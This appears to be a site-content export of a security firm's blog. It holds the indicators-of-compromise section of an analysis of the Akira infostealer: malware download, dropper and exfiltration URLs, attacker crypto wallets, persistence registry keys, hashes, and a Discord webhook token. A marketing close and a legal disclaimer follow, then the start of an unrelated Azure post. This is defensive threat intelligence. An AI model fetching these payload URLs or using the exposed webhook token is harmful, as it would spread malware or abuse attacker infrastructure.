reporting URL",[426,19755,424,19756,424,19759,424,19764,420],{},[443,19757,19758],{},"Vanity Bot (TG)",[443,19760,19761],{},[63,19762,19763],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/mumu[.]php",[443,19765,19766],{},"Vanity address notification endpoint",[426,19768,424,19769,424,19772,424,19777,420],{"style":12370},[443,19770,19771],{},"Vanity Bot (Alt)",[443,19773,19774],{},[63,19775,19776],{},"https[:]//cosmoplanets[.]net/well-known/pki-validation/mumu[.]php",[443,19778,19779],{},"Alternate vanity notification endpoint",[426,19781,424,19782,424,19785,424,19790,420],{},[443,19783,19784],{},"Exodus Injection",[443,19786,19787],{},[63,19788,19789],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/exodus[.]asar",[443,19791,19792,19793,19795],{},"Electron ",[63,19794,12252],{}," app module",[426,19797,424,19798,424,19801,424,19806,420],{"style":12370},[443,19799,19800],{},"Atomic Injection",[443,19802,19803],{},[63,19804,19805],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/atomic[.]asar",[443,19807,19792,19808,19811],{},[63,19809,19810],{},"AtomicWallet"," module",[426,19813,424,19814,424,19817,424,19822,420],{},[443,19815,19816],{},"Updater Download",[443,19818,19819],{},[63,19820,19821],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/Updater[.]exe",[443,19823,19824],{},"Persistence dropper executable",[426,19826,424,19827,424,19830,424,19835,420],{"style":12370},[443,19828,19829],{},"Gofile API List",[443,19831,19832],{},[63,19833,19834],{},"https[:]//api.gofile[.]io/servers",[443,19836,19837],{},"Retrieves best GoFile upload server",[426,19839,424,19840,424,19843,424,19848,420],{},[443,19841,19842],{},"Discord Token Check",[443,19844,19845],{},[63,19846,19847],{},"https[:]//discordapp[.]com/api/v9/users/@me",[443,19849,19850],{},"Validates stolen Discord token",[426,19852,424,19853,424,19856,424,19861,420],{"style":12370},[443,19854,19855],{},"Discord Billing 
Info",[443,19857,19858],{},[63,19859,19860],{},"https[:]//discord[.]com/api/users/@me/billing/payment-sources",[443,19862,19863],{},"Retrieves billing methods",[426,19865,424,19866,424,19869,424,19874,420],{},[443,19867,19868],{},"Google OAuth Replay",[443,19870,19871],{},[63,19872,19873],{},"https[:]//accounts[.]google[.]com/oauth/multilogin",[443,19875,19876],{},"Replays stolen Google session tokens",[426,19878,424,19879,424,19882,424,19887,420],{"style":12370},[443,19880,19881],{},"IP Check (hosting)",[443,19883,19884],{},[63,19885,19886],{},"http[:]//ip-api[.]com/line/?fields=hosting",[443,19888,19889],{},"Hosting environment detection",[426,19891,424,19892,424,19895,424,19900,420],{},[443,19893,19894],{},"IP Lookup (geo)",[443,19896,19897],{},[63,19898,19899],{},"http[:]//ip-api[.]com/json/{ip}",[443,19901,19902],{},"Geolocation by IP",[426,19904,424,19905,424,19908,424,19913,420],{"style":12370},[443,19906,19907],{},"Public IP Retrieval",[443,19909,19910],{},[63,19911,19912],{},"https[:]//api[.]ipify[.]org",[443,19914,19915],{},"Fetches external IP address",[426,19917,424,19918,424,19921,424,19926,420],{},[443,19919,19920],{},"File.io Upload",[443,19922,19923],{},[63,19924,19925],{},"https[:]//file[.]io/",[443,19927,19928],{},"Secondary exfiltration channel",[426,19930,424,19931,424,19934,424,19939,420],{"style":12370},[443,19932,19933],{},"Oshi.at Upload",[443,19935,19936],{},[63,19937,19938],{},"http[:]//oshi[.]at/",[443,19940,19941],{},"Tertiary exfiltration channel",[426,19943,424,19944,424,19947,424,19953,420],{},[443,19945,19946],{},"JS Dropper Primary",[443,19948,19949],{},[2672,19950,19952],{"href":19951,"target":4914},"https://rentry.co/7vzd22fg36hfdd33/raw","https[:]//rentry[.]co/7vzd22fg36hfdd33/raw",[443,19954,19955],{},"Remote reference to actual ZIP URL",[426,19957,424,19958,424,19961,424,19966,420],{"style":12370},[443,19959,19960],{},"JS Dropper Fallback 
1",[443,19962,19963],{},[2672,19964,19965],{"href":11269,"target":4914},"https[:]//cosmicdust[.]zip/.well-known/pki-validation/pyth.zip",[443,19967,19968],{},"Alternative payload ZIP",[426,19970,424,19971,424,19974,424,19979,420],{},[443,19972,19973],{},"JS Dropper Fallback 2",[443,19975,19976],{},[2672,19977,19978],{"href":11274,"target":4914},"https[:]//cosmoplanets[.]net/well-known/pki-validation/pyth.zip",[443,19980,19981],{},"Secondary fallback payload ZIP",[52,19983],{"className":19984},[8535,8536],[41,19986,19988],{"id":19987},"_2-cryptocurrency-addresses","2. Cryptocurrency Addresses",[12,19990,47],{},[417,19992,420,19994],{"className":19993,"style":12346},[18762],[438,19995,19996,420,20004,420,20014,420,20024,420,20034,420,20043,420,20053,420,20063,420,20073,420,20083,420,20093],{},[426,19997,424,19998,424,20001,420],{},[430,19999,20000],{"style":18773},"Currency",[430,20002,20003],{"style":12514},"Address",[426,20005,424,20006,424,20009,420],{},[443,20007,20008],{},"BTC",[443,20010,20011],{},[63,20012,20013],{},"bc1qnmz2l8lr0yzj9eun48dyds7rlzg6t6hk5vw5zt",[426,20015,424,20016,424,20019,420],{"style":12370},[443,20017,20018],{},"ETH",[443,20020,20021],{},[63,20022,20023],{},"0xa8a2C9e3fbCde807101dBD87aF7b51583f83d1D5",[426,20025,424,20026,424,20029,420],{},[443,20027,20028],{},"DOGE",[443,20030,20031],{},[63,20032,20033],{},"DACeoqWDPmNARSZAeDZPFwqwecbByaksmd",[426,20035,424,20036,424,20039,420],{"style":12370},[443,20037,20038],{},"LTC",[443,20040,20041],{},[63,20042,18803],{},[426,20044,424,20045,424,20048,420],{},[443,20046,20047],{},"XMR",[443,20049,20050],{},[63,20051,20052],{},"4AVdkoC16zwcjxF4q9cXdL2D4vGqC9iPAcQ9gmHzQ7JS1fUUff6Za3D6CKm9MsDrhSDRY9hgeca7yKnMGpaD8dq6Bo3mT7D",[426,20054,424,20055,424,20058,420],{"style":12370},[443,20056,20057],{},"BCH",[443,20059,20060],{},[63,20061,20062],{},"qrfs8ee558t0a2dlp9v6h4qzns5cd6pltqrrn883xs",[426,20064,424,20065,424,20068,420],{},[443,20066,20067],{},"DASH",[443,20069,20070],{},[63,20071,20072],{},"XpeiSH1Mf
QYeehTfxosYHyTHzbgu2LNsG1",[426,20074,424,20075,424,20078,420],{"style":12370},[443,20076,20077],{},"TRX",[443,20079,20080],{},[63,20081,20082],{},"TFuYQoosCUqbVjibowMqaa3W3h3RtAVDbK",[426,20084,424,20085,424,20088,420],{},[443,20086,20087],{},"XRP",[443,20089,20090],{},[63,20091,20092],{},"r36AwwhUH7BRujevi5mukbDrG46KGbTk8V",[426,20094,424,20095,424,20098,420],{"style":12370},[443,20096,20097],{},"XLM",[443,20099,20100],{},[63,20101,20102],{},"GAEPMD52PX7FYX65AJJLEFZSH3DZSL3DKM2XRXHVJP4CLJFIBKI25C33",[52,20104],{"className":20105},[8535,8536],[41,20107,20109],{"id":20108},"_3-registry-keys-paths","3. Registry Keys / Paths",[12,20111,47],{},[417,20113,420,20115],{"className":20114,"style":12346},[18762],[438,20116,20117,420,20124,420,20134,420,20144,420,20157],{},[426,20118,424,20119,424,20122,420],{},[430,20120,9340],{"style":20121},"text-align: left; width: 60%;",[430,20123,8885],{"style":12514},[426,20125,424,20126,424,20131,420],{},[443,20127,20128],{},[63,20129,20130],{},"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc",[443,20132,20133],{},"Checks for virtual GPU driver signature",[426,20135,424,20136,424,20141,420],{"style":12370},[443,20137,20138],{},[63,20139,20140],{},"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName",[443,20142,20143],{},"Checks for virtual GPU provider name",[426,20145,424,20146,424,20154,420],{},[443,20147,20148,20151,20152,1288],{},[63,20149,20150],{},"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"," (value ",[251,20153,9351],{},[443,20155,20156],{},"Persistence via Run key (Updater.exe)",[426,20158,424,20159,424,20163,420],{"style":12370},[443,20160,20161],{},[63,20162,9359],{},[443,20164,20165],{},"Persistence Executable",[52,20167],{"className":20168},[8535,8536],[41,20170,20172],{"id":20171},"_5-files-hashes","5. 
Files & Hashes",[12,20174,47],{},[417,20176,420,20178],{"className":20177,"style":12346},[18762],[438,20179,20180,420,20191,420,20203,420,20215,420,20228,420,20240,420,20252,420,20264,420,20276,420,20289,420,20301,420,20314,420,20326],{},[426,20181,424,20182,424,20184,424,20188,420],{},[430,20183,19106],{"style":19694},[430,20185,20187],{"style":20186},"text-align: left; width: 62%;","SHA256",[430,20189,20190],{"style":12514},"Size (bytes)",[426,20192,424,20193,424,20195,424,20200,420],{},[443,20194,9509],{},[443,20196,20197],{},[63,20198,20199],{},"331A4A4D721A1B5B1BB5E9A5C13462D5CDB16248DEFE0F16BE6E1E57C275E380",[443,20201,20202],{},"63936274",[426,20204,424,20205,424,20207,424,20212,420],{"style":12370},[443,20206,8300],{},[443,20208,20209],{},[63,20210,20211],{},"C98F0F5B89C6DAC1482286FAA2E33A84230C26EA38DA4E013665582C9A04213B",[443,20213,20214],{},"162036224",[426,20216,424,20217,424,20220,424,20225,420],{},[443,20218,20219],{},"jscrypter.js",[443,20221,20222],{},[63,20223,20224],{},"0A47985F8B3716058B0DF6C68EC97D0F1F3CB0F7A31562A819C3E766ED4CDCEF",[443,20226,20227],{},"1429",[426,20229,424,20230,424,20232,424,20237,420],{"style":12370},[443,20231,10491],{},[443,20233,20234],{},[63,20235,20236],{},"1E666F3CF6E3DA6EED973E00E81EC721B33B17D4E981CB506F62F349DC1B3343",[443,20238,20239],{},"30138",[426,20241,424,20242,424,20244,424,20249,420],{},[443,20243,10488],{},[443,20245,20246],{},[63,20247,20248],{},"E375DE29E23C43627B2894EA01B6B1C7D9B1BD37E7305EEC7185CEE9719924A7",[443,20250,20251],{},"7155",[426,20253,424,20254,424,20256,424,20261,420],{"style":12370},[443,20255,10421],{},[443,20257,20258],{},[63,20259,20260],{},"972C634FD0666BCA12A6B7A50E69C32610321E9EC4D28D65734E55437D345CC6",[443,20262,20263],{},"211",[426,20265,424,20266,424,20268,424,20273,420],{},[443,20267,8304],{},[443,20269,20270],{},[63,20271,20272],{},"850361AF7D6C006900FC638D6ACBD9A6362385BAD0530CFBD52555E6415DB3A4",[443,20274,20275],{},"205210",[426,20277,424,20278,424,20281,424,20286,420],{"sty
le":12370},[443,20279,20280],{},"exodus.asar",[443,20282,20283],{},[63,20284,20285],{},"6A3B5D5A6BA5925DF39351830D92A2B5E4720803FE9F8040C3E67C12F668F4EB",[443,20287,20288],{},"132486332",[426,20290,424,20291,424,20293,424,20298,420],{},[443,20292,9568],{},[443,20294,20295],{},[63,20296,20297],{},"10E4A6B54CC0CF4D18DDE8B69E0B305ABE487E07ED990C5BFF82CE30B217B910",[443,20299,20300],{},"28454",[426,20302,424,20303,424,20306,424,20311,420],{"style":12370},[443,20304,20305],{},"download.dat",[443,20307,20308],{},[63,20309,20310],{},"C49E83A5F154F7E54CA0CE9EECEA066A721966786F2850626252DDA0BE0BF79B",[443,20312,20313],{},"21142",[426,20315,424,20316,424,20318,424,20323,420],{},[443,20317,10549],{},[443,20319,20320],{},[63,20321,20322],{},"E6F6AD49076367A58220E48691A34E33C18F0285FD9C50879A9B83A99F840AD7",[443,20324,20325],{},"32375391",[426,20327,424,20328,424,20330,424,20335,420],{"style":12370},[443,20329,8296],{},[443,20331,20332],{},[63,20333,20334],{},"36C34E39DC7D54C4C97DDEB9B6C7FD429DB26C34D65CCE8BE3523FDFDB7CEBE0",[443,20336,20337],{},"37652937",[52,20339],{"className":20340},[8535,8536],[41,20342,20344],{"id":20343},"_5-discord-telegram-identifier","5. 
Discord & Telegram Identifier",[12,20346,47],{},[417,20348,420,20350],{"className":20349,"style":12346},[18762],[438,20351,20352,420,20358,420,20368,420,20378],{},[426,20353,424,20354,424,20356,420],{},[430,20355,19695],{"style":13965},[430,20357,436],{"style":12514},[426,20359,424,20360,424,20363,420],{},[443,20361,20362],{},"Discord Webhook ID",[443,20364,20365],{},[63,20366,20367],{},"1226766972675428372",[426,20369,424,20370,424,20373,420],{"style":12370},[443,20371,20372],{},"Discord Webhook Token",[443,20374,20375],{},[63,20376,20377],{},"BuBywdldEWncg7fbIpEhCROLpkGLkYirOoP2bP-uzzOatDaxSpaWqaLNerun85qCfwNz",[426,20379,424,20380,424,20383,420],{},[443,20381,20382],{},"Telegram ID",[443,20384,20385],{},[63,20386,20387],{},"5035121855",[52,20389],{"className":20390},[8535,8536],[25,20392,20394],{"id":20393},"_14-reflecting-on-the-akira-stealer-incident-strengthening-your-defense-with-glueckkanja-csoc","14. Reflecting on the Akira Stealer Incident: Strengthening Your Defense with glueckkanja CSOC",[12,20396,31],{},[12,20398,20399],{},"Throughout this blog, we've explored the sophisticated nature of the Akira Infostealer—an advanced cyber threat characterized by targeted credential theft, stealthy data exfiltration, and persistent methods to evade traditional defenses. Understanding how this malware functions, the risks it poses, and the vulnerabilities it exploits is crucial in building a robust cybersecurity strategy.",[12,20401,20402],{},"The Akira Infostealer specifically targets sensitive data such as login credentials, browser sessions, cryptocurrency wallets, messaging services, and personal or organizational files. Its calculated and precise methods demand more than just standard security measures—they require continuous monitoring, in-depth forensic analysis, and proactive threat intelligence.",[12,20404,20405],{},"At glueckkanja CSOC, we leverage our deep technical expertise and advanced analytical capabilities to go beyond simple detection. 
Our specialized team continually monitors threats in real-time from our dedicated CSOC servers, enabling immediate identification, thorough investigation, and effective neutralization of threats like the Akira Infostealer.",[12,20407,20408],{},"But our work doesn’t stop at incident response. Every detected incident enriches our knowledge base, enhancing our security posture and ensuring we remain several steps ahead of future threats. With glueckkanja CSOC, you gain more than protection—you gain an adaptive security partner committed to your long-term resilience.",[12,20410,20411],{},"Take the next step in securing your organization's digital assets.",[12,20413,20414],{},"Contact glueckkanja's cybersecurity experts today, and let’s proactively secure your future together.",[12,20416,20417],{},[251,20418,20419],{},"Empower your defense with glueckkanja CSOC.",[25,20421,20423],{"id":20422},"_15-security-legal-disclaimer-use-of-real-malware-code","15. Security & Legal Disclaimer – Use of Real Malware Code",[12,20425,31],{},[12,20427,20428],{},"This publication contains detailed technical insights, including code excerpts and behavioral breakdowns derived from actual malicious software discovered during incident response and forensic investigations. The purpose of sharing this information is strictly educational, intended to help professional defenders understand, detect, and respond to real-world threats more effectively. We publish this in good faith and with the intent to contribute to the broader security community.",[12,20430,20431],{},"It is important to note that portions of the included code originate from threat actor toolkits and malware samples circulating in the wild. These fragments are not our intellectual property, nor are they to be considered safe, sanitized, or otherwise \"harmless.\" The reproduction or operational use of any such code is explicitly discouraged. 
Readers must understand that while this material serves a research and awareness function, it inherently carries a risk profile that should not be underestimated.",[12,20433,20434],{},"Only trained professionals operating within legally authorized environments—such as accredited security teams, SOC units, academic researchers, or malware labs—should engage with the techniques or code described. All experimentation must be confined to isolated, non-production systems, and comply with applicable laws, internal policies, and ethical standards.",[12,20436,20437],{},"We do not provide support or validation for any reproduced code or behavior. There is no guarantee of accuracy, relevance, or completeness. Furthermore, we explicitly reject any use of this content for offensive purposes, unauthorized red teaming, commercial malware development, or adversarial testing outside a legally defined scope. Any misuse may lead to legal consequences. glueckkanja AG disclaims all responsibility for direct or indirect damages arising from the use or misinterpretation of this content.",[12,20439,20440],{},"By continuing to read or reference this content, you acknowledge the above and agree not to misuse, replicate, or apply any part of it in unlawful or unethical contexts. 
When in doubt, consult your legal, compliance, or data protection office before engaging with live code analysis or similar technical material.",[12,20442,20443],{},"This publication is provided \"as is,\" without warranty, support, or liability.",[2127,20445,20446],{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}html pre.shiki code .sJ8bj, html code.shiki .sJ8bj{--shiki-default:#6A737D;--shiki-dark:#6A737D}html pre.shiki code .s4XuR, html code.shiki .s4XuR{--shiki-default:#E36209;--shiki-dark:#FFAB70}html pre.shiki code .s9eBZ, html code.shiki 
.s9eBZ{--shiki-default:#22863A;--shiki-dark:#85E89D}",{"title":65,"searchDepth":111,"depth":111,"links":20448},[20449,20450,20451,20452,20463,20464,20465,20466,20467,20468,20469,20470,20472,20473,20474,20475,20476,20477,20478,20479,20480,20483,20491,20492,20493,20499,20517,20535,20536,20537,20538,20546,20553,20560,20569,20576,20577,20578,20579,20580,20581,20582,20583,20584,20585,20586,20587,20588,20589,20590,20591],{"id":8426,"depth":111,"text":8427},{"id":8474,"depth":111,"text":8475},{"id":8494,"depth":111,"text":8495},{"id":8548,"depth":111,"text":8549,"children":20453},[20454,20455,20457,20459,20461],{"id":8568,"depth":329,"text":8569},{"id":8620,"depth":329,"text":20456},"2.1.2 Updater.exe – Initial Loader",{"id":8725,"depth":329,"text":20458},"2.1.3 main.exe – Obfuscated NodeJS Payload Container",{"id":8843,"depth":329,"text":20460},"2.1.4 cmd.exe & PowerShell Relay",{"id":8953,"depth":329,"text":20462},"2.1.5 python.exe with astor.py",{"id":9087,"depth":111,"text":9088},{"id":9167,"depth":111,"text":9168},{"id":9245,"depth":111,"text":9246},{"id":9324,"depth":111,"text":9325},{"id":9391,"depth":111,"text":9392},{"id":9471,"depth":111,"text":9472},{"id":9580,"depth":111,"text":9581},{"id":9697,"depth":111,"text":20471},"4.2 AMSI Bypass Technique (Class: 
gofor4msi)",{"id":9880,"depth":111,"text":9881},{"id":10001,"depth":111,"text":10002},{"id":10099,"depth":111,"text":10100},{"id":10195,"depth":111,"text":10196},{"id":10270,"depth":111,"text":10271},{"id":10340,"depth":111,"text":10341},{"id":10400,"depth":111,"text":10401},{"id":10535,"depth":111,"text":10536},{"id":10596,"depth":111,"text":10597,"children":20481},[20482],{"id":10608,"depth":329,"text":10609},{"id":10957,"depth":111,"text":10958,"children":20484},[20485,20486,20487,20488,20489,20490],{"id":10966,"depth":329,"text":10967},{"id":11080,"depth":329,"text":11081},{"id":11277,"depth":329,"text":11278},{"id":11564,"depth":329,"text":11565},{"id":11640,"depth":329,"text":11641},{"id":11800,"depth":329,"text":11801},{"id":12035,"depth":111,"text":12036},{"id":12081,"depth":111,"text":12082},{"id":12093,"depth":111,"text":12094,"children":20494},[20495,20496,20497,20498],{"id":12099,"depth":329,"text":12100},{"id":12143,"depth":329,"text":12144},{"id":12205,"depth":329,"text":12206},{"id":12240,"depth":329,"text":12241},{"id":12276,"depth":111,"text":20500,"children":20501},"7.3 Anti-Analysis / Evasion (Class: VmProtect)",[20502,20503,20504,20505,20507,20508,20509,20510,20511,20512,20513,20514,20515,20516],{"id":12285,"depth":329,"text":12286},{"id":12300,"depth":329,"text":12301},{"id":12340,"depth":329,"text":12341},{"id":12429,"depth":329,"text":20506},"7.3.4 VmProtect Architecture",{"id":12782,"depth":329,"text":12783},{"id":12848,"depth":329,"text":12849},{"id":12917,"depth":329,"text":12918},{"id":12981,"depth":329,"text":12982},{"id":13049,"depth":329,"text":13050},{"id":13106,"depth":329,"text":13107},{"id":13204,"depth":329,"text":13205},{"id":13273,"depth":329,"text":13274},{"id":13729,"depth":329,"text":13730},{"id":13776,"depth":329,"text":13777},{"id":13790,"depth":111,"text":13791,"children":20518},[20519,20520,20522,20524,20526,20528,20530,20532,20534],{"id":13949,"depth":329,"text":13950},{"id":14057,"depth":329,"text":20521},"7.4.2 
Password Dumper (Chromium.GetPasswords)",{"id":14179,"depth":329,"text":20523},"7.4.3 Credit Card Dumper (Chromium.GetCreditCards)",{"id":14261,"depth":329,"text":20525},"7.4.4 Cookie Dumper (Chromium.GetCookies)",{"id":14341,"depth":329,"text":20527},"7.4.5 Google Session Dumper (Chromium.dump_google_sessions)",{"id":14468,"depth":329,"text":20529},"7.4.6 History Dumper (Chromium.GetHistory)",{"id":14538,"depth":329,"text":20531},"7.4.7 Autofill Dumper (Chromium.GetAutofills)",{"id":14601,"depth":329,"text":20533},"7.4.8 Firefox Profile Grabber (GeckoDriver & grabFirefoxProfiles)",{"id":14679,"depth":329,"text":14680},{"id":14718,"depth":111,"text":14719},{"id":15050,"depth":111,"text":15051},{"id":15164,"depth":111,"text":15165},{"id":15492,"depth":111,"text":15493,"children":20539},[20540,20541,20542,20543,20544,20545],{"id":15501,"depth":329,"text":15502},{"id":15652,"depth":329,"text":15653},{"id":15758,"depth":329,"text":15759},{"id":15883,"depth":329,"text":15884},{"id":15950,"depth":329,"text":15951},{"id":16075,"depth":329,"text":16076},{"id":16180,"depth":111,"text":20547,"children":20548},"7.9. 
Discord and Telegram Token Theft (Class: Discord)",[20549,20550,20551,20552],{"id":16194,"depth":329,"text":16195},{"id":16325,"depth":329,"text":16326},{"id":16568,"depth":329,"text":16569},{"id":16649,"depth":329,"text":16650},{"id":16719,"depth":111,"text":16720,"children":20554},[20555,20557,20558,20559],{"id":16732,"depth":329,"text":20556},"7.10.1 Data Class Initialization",{"id":16830,"depth":329,"text":16831},{"id":16950,"depth":329,"text":16951},{"id":17015,"depth":329,"text":17016},{"id":17092,"depth":111,"text":20561,"children":20562},"7.11 File Grabber (Class: Utils.steal_files)",[20563,20564,20565,20566,20567,20568],{"id":17104,"depth":329,"text":17105},{"id":17175,"depth":329,"text":17176},{"id":17237,"depth":329,"text":17238},{"id":17270,"depth":329,"text":17271},{"id":17299,"depth":329,"text":17300},{"id":17478,"depth":329,"text":17479},{"id":17586,"depth":111,"text":17587,"children":20570},[20571,20572,20573,20574,20575],{"id":17595,"depth":329,"text":17596},{"id":17610,"depth":329,"text":17611},{"id":17689,"depth":329,"text":17690},{"id":17838,"depth":329,"text":17839},{"id":18071,"depth":329,"text":18072},{"id":18422,"depth":111,"text":18423},{"id":18453,"depth":111,"text":18454},{"id":18577,"depth":111,"text":18578},{"id":18688,"depth":111,"text":18689},{"id":18739,"depth":111,"text":18740},{"id":18916,"depth":111,"text":18917},{"id":18966,"depth":111,"text":18967},{"id":19010,"depth":111,"text":19011},{"id":19050,"depth":111,"text":19051},{"id":19141,"depth":111,"text":19142},{"id":19158,"depth":111,"text":19159},{"id":19681,"depth":111,"text":19682},{"id":19987,"depth":111,"text":19988},{"id":20108,"depth":111,"text":20109},{"id":20171,"depth":111,"text":20172},{"id":20343,"depth":111,"text":20344},{"lang":2171,"seoTitle":20593,"titleClass":2173,"date":20594,"categories":20595,"blogtitlepic":20596,"socialimg":20597,"customExcerpt":20598,"keywords":20599,"maxContent":2181,"asideNav":20600,"footer":20649,"contactInContent":20650,"published":2181,
"hreflang":20666},"Akira Stealer: Technical Analysis of a Modular Info-Stealing Malware","2025-06-16",[2176],"head-quiet-breach.png","/blog/heads/head-quiet-breach.png","It started with a single Defender alert in Microsoft 365. No malware, no signatures, no panic. Just a whisper in the noise. What we uncovered was months of credential theft - surgical, silent, and nearly invisible. This is how our CSOC turned a quiet signal into a full-scale response. And gave our client back control before they even knew it was gone.","Microsoft 365 Security, Credential Theft Detection, Incident Response, Microsoft Defender, Managed Security Services, Cloud Security, Threat Detection, Cyber Attack Detection, CSOC, Advanced Threat Protection",{"menuItems":20601},[20602,20604,20607,20610,20613,20616,20619,20622,20625,20628,20631,20634,20637,20640,20643,20646],{"href":20603,"text":8258},"#prologue",{"href":20605,"text":20606},"#_1-initial-event-and-triage-summary","Initial Event and Triage Summary",{"href":20608,"text":20609},"#_2-malware-architecture-and-execution-chain-overview","Malware Architecture and Execution Chain Overview",{"href":20611,"text":20612},"#_3-deep-dive-updaterexe","Deep Dive: Updater.exe",{"href":20614,"text":20615},"#_4-deep-dive-powbat","Deep Dive: pow.bat",{"href":20617,"text":20618},"#_5-deep-dive-mainexe-electron-based-malware-loader","Deep Dive: main.exe",{"href":20620,"text":20621},"#_6-deep-dive-inputjs-the-encrypted-javascript-payload-loader","Deep Dive: input.js",{"href":20623,"text":20624},"#_7-deepdive-akira-stealer-v2-astorpy","DeepDive: Akira Stealer v2",{"href":20626,"text":20627},"#_8-circular-execution-chain-a-self-healing-loop","Circular Execution Chain",{"href":20629,"text":20630},"#_9-blockchain-tracking-and-analysis","Blockchain Tracking and Analysis",{"href":20632,"text":20633},"#_10-inside-the-akira-ecosystem-commercialized-cybercrime-infrastructure","Inside the Akira 
Ecosystem",{"href":20635,"text":20636},"#_11-akira-stealer-quickcheck-affected-files","Akira Stealer QuickCheck affected files",{"href":20638,"text":20639},"#_12-beyond-response-how-glueckkanja-csoc-turns-incidents-into-insights","How glueckkanja CSOC Turns Incidents into Insights",{"href":20641,"text":20642},"#_13-indicators-of-compromise-iocs","Indicators of Compromise (IOCs)",{"href":20644,"text":20645},"#_14-reflecting-on-the-akira-stealer-incident-strengthening-your-defense-with-glueckkanja-csoc","Reflecting on the Akira Stealer Incident",{"href":20647,"text":20648},"#_15-security-legal-disclaimer-use-of-real-malware-code","Security & Legal Disclaimer",{"noMargin":2181},{"quote":2168,"infos":20651},{"bgColor":6344,"color":5865,"boxBgColor":6345,"boxColor":5863,"headline":5933,"subline":7756,"level":41,"textStyling":2204,"flush":2205,"person":20652,"form":20656},{"image":5936,"cloudinary":2181,"alt":5937,"name":5937,"detailsHeader":5269,"details":20653},[20654,20655],{"text":5272,"href":5273,"details":5873,"icon":5275},{"text":5277,"href":5278,"icon":5279},{"ctaText":5281,"cta":20657,"method":2169,"action":2216,"fields":20658},{"skin":2215},[20659,20660,20661,20662,20663,20664,20665],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":2236,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2247,"value":7769},{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},[20667,20669],{"lang":2260,"href":20668},"/de/posts/2025-06-16-quiet-breach",{"lang":2263,"href":20670},"/es/posts/2025-06-16-quiet-breach","/posts/2025-06-16-quiet-breach",{"title":8251,"description":31},"posts/2025-06-16-quiet-breach",[20675,2269,2273,20676],"Microsoft 365 Defender","Incident Deep 
Dive","8tQEQ_kUSt_3ETplARXmvucSYVhgePzGqcIWlJx0yFI",{"id":20679,"title":20680,"author":20681,"body":20682,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":20848,"moment":2166,"navigation":2181,"path":20883,"seo":20884,"stem":20885,"tags":20886,"webcast":2168,"__hash__":20889},"content_en/posts/2025-07-22-azure-certified-modules.md","Next Level Azure IaC: Azure Verified Modules",[2510],{"type":9,"value":20683,"toc":20841},[20684,20688,20690,20698,20701,20712,20715,20718,20726,20730,20732,20735,20738,20752,20755,20758,20762,20764,20767,20771,20773,20776,20779,20782,20802,20805,20813,20816,20820],[41,20685,20687],{"id":20686},"azure-verified-modules-iac-according-to-microsoft-best-practices","Azure Verified Modules – IaC According to Microsoft Best Practices",[12,20689,31],{},[12,20691,20692,20693,20697],{},"Microsoft has taken on this challenge and created the ",[2672,20694,20696],{"href":20695},"https://azure.github.io/Azure-Verified-Modules","Azure Verified Modules (AVM)",", a framework for structured resource deployment in Azure based on best practices.",[12,20699,20700],{},"AVM comes in three different variants:",[1254,20702,20703,20706,20709],{},[1257,20704,20705],{},"Resource Modules – Deployment of a defined cloud resource",[1257,20707,20708],{},"Pattern Modules – Deployment of a defined cloud workload",[1257,20710,20711],{},"Utility Modules – Helper modules used by Resource or Pattern Modules",[12,20713,20714],{},"To ensure consistency, Microsoft has set out a series of requirements that every new AVM resource must meet. 
These requirements apply to both Terraform and Microsoft Azure’s own IaC language, Bicep.",[12,20716,20717],{},"Each AVM is assigned to a specific Microsoft employee who is responsible for its creation, ongoing development and handling issues.",[12,20719,20720,20721,20725],{},"All available modules are open source (MIT license) and accessible in public GitHub repositories under the general ",[2672,20722,20724],{"href":20723},"https://github.com/Azure","Azure GitHub organization",". If a module causes issues or lacks a required parameter, anyone can file an issue or contribute to its development.",[41,20727,20729],{"id":20728},"how-do-you-get-started-with-avm","How Do You Get Started with AVM?",[12,20731,31],{},[12,20733,20734],{},"AVM works just like any other module in Terraform or Bicep; they are called independently and receive all required parameters. The AVM guidelines ensure that the number of required parameters is minimised to provide an easy entry point.",[12,20736,20737],{},"Example with Terraform:\nTo deploy a virtual machine with an additional data disk, you would typically need at least the following Azure resources:",[1254,20739,20740,20743,20746,20749],{},[1257,20741,20742],{},"azurerm_windows_virtual_machine or 